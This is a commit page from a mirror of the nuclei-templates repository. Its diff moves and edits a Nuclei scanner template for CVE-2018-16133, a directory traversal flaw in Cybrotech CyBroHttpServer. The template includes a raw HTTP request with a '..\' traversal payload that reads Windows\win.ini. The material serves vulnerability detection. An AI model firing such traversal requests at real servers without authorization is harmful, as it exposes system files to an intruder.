daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update and rename CVE-2018-16133.yaml to cves/2018/CVE-2018-16133.yaml

patch-1
Prince Chaddha 2021-12-01 19:15:56 +05:30 committed by GitHub
parent 1357c89ca5
commit c77356d541
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
CVE-2018-16133.yaml → cves/2018/CVE-2018-16133.yaml
View File

@ -3,23 +3,25 @@ info:
name: Cybrotech CyBroHttpServer 1.0.3 Directory Traversal
author: 0x_Akoko
severity: medium
description: ybrotech CyBroHttpServer 1.0.3 allows Directory Traversal in the URI.
description: Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal in the URI.
reference:
- https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html
- http://www.cybrotech.com/
- https://www.cvedetails.com/cve/CVE-2018-16133
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2018-16133
cwe-id: CWE-22
tags: cve,cve2018,tarantella,lfi
tags: cve,cve2018,cybrotech,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/..\..\..\..\Windows\win.ini'
- raw:
- |
GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
unsafe: true
matchers:
- type: word
part: body